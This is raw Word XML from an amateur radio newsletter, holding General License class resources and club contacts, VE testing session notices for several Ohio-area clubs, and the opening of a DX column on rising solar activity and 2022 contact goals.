    <w:p w14:paraId="70D3D915" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Provide a sample news release you can modify for your local media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3BF42B" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Refer all students completing the classes to radio clubs and VECs in their local area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912BAB6" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:lastRenderedPageBreak/>
        <w:t>Advertise the class on the ARRL website and locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91AE96" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109"/>
    <w:p w14:paraId="55E37B7F" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve">The General License classes will begin Sunday, Jan 16th, and run for six weeks. Classes are 1:30 to 4:00 PM and all students must pre-register. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13058A29" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109"/>
    <w:p w14:paraId="56920442" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:t>Resources/Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA4F1D" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve">Class Info- </w:t>
      </w:r>
      <w:hyperlink r:id="rId145">
        <w:r w:rsidRPr="00870109">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>tiny.cc/beaham</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve"> or  </w:t>
      </w:r>
      <w:hyperlink r:id="rId146">
        <w:r w:rsidRPr="00870109">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve"> (https://docs.google.com/presentation/d/e/2PACX-1vQU9aeMBjS5jeJn_Zz5bpxiFNKOdGkGePYGbXe_hk96aE2iabOZWtFcn4ONEdqMwsdnR6KTUQ4_jWNK/pub?start=false&amp;loop=false&amp;delayms=3000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1879DE09" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve">Class Registration- </w:t>
      </w:r>
      <w:hyperlink r:id="rId147">
        <w:r w:rsidRPr="00870109">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve"> (http://tiny.cc/cfarc-gen)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647B239" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Sample News Release (a Google Doc that will make a copy and you can edit for your local media)-</w:t>
      </w:r>
      <w:hyperlink r:id="rId148">
        <w:r w:rsidRPr="00870109">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve"> link</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="578CFBF6" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve">Flyer- </w:t>
      </w:r>
      <w:hyperlink r:id="rId149">
        <w:r w:rsidRPr="00870109">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56AB029A" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Contact Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FBFE8" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Anthony Luscre, K8ZT k8zt@arrl.net 330-650-1110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2320D" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00870109">
        <w:t>Jim Grover, N8PZL n8pzl@arrl.net 330 928-8921</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706DF7C" w14:textId="77777777" w:rsidR="00870109" w:rsidRPr="00870109" w:rsidRDefault="00870109" w:rsidP="00870109">
      <w:r w:rsidRPr="00870109">
        <w:t xml:space="preserve">Please contact us if interested in participating at </w:t>
      </w:r>
      <w:hyperlink r:id="rId150">
        <w:r w:rsidRPr="00870109">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>k8zt@arrl.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EEAC8F4" w14:textId="09C63B43" w:rsidR="00764418" w:rsidRPr="00764418" w:rsidRDefault="00764418" w:rsidP="00764418">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102C2763" w14:textId="25A973B6" w:rsidR="00764418" w:rsidRPr="00764418" w:rsidRDefault="00764418" w:rsidP="00764418">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="DDDDDD"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3436A0DB" w14:textId="77777777" w:rsidR="00764418" w:rsidRDefault="00764418" w:rsidP="009E1AA2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A65DFA1" w14:textId="77777777" w:rsidR="00764418" w:rsidRDefault="00764418" w:rsidP="009E1AA2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A35F25" w14:textId="0E5EEAE4" w:rsidR="009E1AA2" w:rsidRPr="009E1AA2" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="VE"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VE Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2185C9B6" w14:textId="77777777" w:rsidR="009E1AA2" w:rsidRPr="009E1AA2" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFB3247" w14:textId="0DF7FC19" w:rsidR="009E1AA2" w:rsidRPr="009E1AA2" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2055">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dayton Amateur Radio Association (DARA)</w:t>
      </w:r>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are interested in testing for a new or upgraded license, please come see us at the DARA Clubhouse.  If you have questions about testing, please email </w:t>
      </w:r>
      <w:hyperlink r:id="rId151" w:history="1">
        <w:r w:rsidRPr="009E1AA2">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>exams.w8bi@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BC4AAEE" w14:textId="77777777" w:rsidR="009E1AA2" w:rsidRPr="009E1AA2" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323B8007" w14:textId="77777777" w:rsidR="002F2055" w:rsidRPr="004F4AC0" w:rsidRDefault="002F2055" w:rsidP="002F2055">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>All Things Amateur Radio Association (ATARA)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> We host testing sessions every second Tuesday of the month to sign up please visit our website </w:t>
      </w:r>
      <w:hyperlink r:id="rId152" w:history="1">
        <w:r w:rsidRPr="004F4AC0">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://atara-w8atr.fun</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and contact us at </w:t>
      </w:r>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r w:rsidRPr="004F4AC0">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>hamexams@atara-w8atr.fun</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004F4AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A81650" w14:textId="77777777" w:rsidR="009E1AA2" w:rsidRPr="009E1AA2" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6CCA09" w14:textId="77777777" w:rsidR="009E1AA2" w:rsidRPr="002F2055" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2055">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Portage County Amateur Radio Service (PCARS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8FA657" w14:textId="77777777" w:rsidR="009E1AA2" w:rsidRPr="009E1AA2" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_bqplciuxvqvy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Starting on August 7th, PCARS will resume VE testing at the PCARS club site in Ravenna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ED471A" w14:textId="77777777" w:rsidR="009E1AA2" w:rsidRPr="009E1AA2" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Please visit the PCARS web site and check out the information about VE testing in the latest newsletter – </w:t>
      </w:r>
      <w:hyperlink r:id="rId154" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E1AA2">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0066CC"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>https://portcars.org/files/newsletter/2021/PCARS-June-21.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>  – see pages 8, 9 and 10 for details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD6EB6" w14:textId="77777777" w:rsidR="009E1AA2" w:rsidRPr="009E1AA2" w:rsidRDefault="009E1AA2" w:rsidP="009E1AA2">
      <w:pPr>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>If you have any questions, don’t hesitate to contact me at KB8UUZ@gmail,com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629739A" w14:textId="0DF5C65F" w:rsidR="00F009B7" w:rsidRPr="00C742C4" w:rsidRDefault="009E1AA2" w:rsidP="00C742C4">
      <w:pPr>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AA2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>On behalf of the VE team at PCARS, we all look forward to getting the VE testing going again and look forward to seeing you there – August 7th -10 am – at the PCARS club site in Ravenna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090B73B" w14:textId="77777777" w:rsidR="00F009B7" w:rsidRPr="00F009B7" w:rsidRDefault="00F009B7" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2170A1B2" w14:textId="77777777" w:rsidR="009E45AE" w:rsidRPr="009E45AE" w:rsidRDefault="009E45AE" w:rsidP="009E45AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F7FCAE" w14:textId="77777777" w:rsidR="009E45AE" w:rsidRPr="009E45AE" w:rsidRDefault="009E45AE" w:rsidP="009E45AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6500FC94" w14:textId="77777777" w:rsidR="00F009B7" w:rsidRDefault="00F009B7" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336B362F" w14:textId="72B53A87" w:rsidR="0067018A" w:rsidRPr="0069420F" w:rsidRDefault="0084211F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="329C2444">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00095F71" w14:textId="77777777" w:rsidR="006A142E" w:rsidRDefault="006A142E" w:rsidP="004D5164">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730B5DF6" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="dx"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253005824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18B277DE" wp14:editId="11AD37C6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4257675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1554480" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2" name="Picture 2" descr="A person wearing glass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erson wearing glasses&#10;&#10;Description automatically generated with medium confidence"/>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554480" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>DX This Week – 2022 Goals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1620A646" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Bill AJ8B (aj8b@arrl.net, @AJ8B, or www.aj8b.com) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D97814D" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>CWOPs Member #1567</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384857D1" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5DB5AE" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sunspots and solar activity is certainly increasing. I noticed several late night openings at the bottom of 20M and increased activity on 40M. The spots from the Midwest included Alaska, Andorra, Argentina, Azores, Belize, Bosnia-Herzegovina, Brazil, Canada, Canary Islands, Chile, Crete, Cuba, Dominica, Ecuador, Falkland Islands, Fed. Rep. of Germany, Georgia, Greenland, Hawaii, Honduras, Indonesia, Italy, Jamaica, Kuwait, Mauritania, Mexico, Montenegro, Morocco, Namibia, New Zealand, Panama, Portugal, Puerto Rico, Republic of Korea, South Africa, St. Helena, Sweden, Thailand, Trinidad &amp; Tobago, Uruguay, and Western Sahara. This gives us 220 unique entity spots for the year. When you add the 40 zones, you would have 260 points for the CQ Marathon contest. Let me know how you did!</w:t>
      </w:r>
    </w:p>
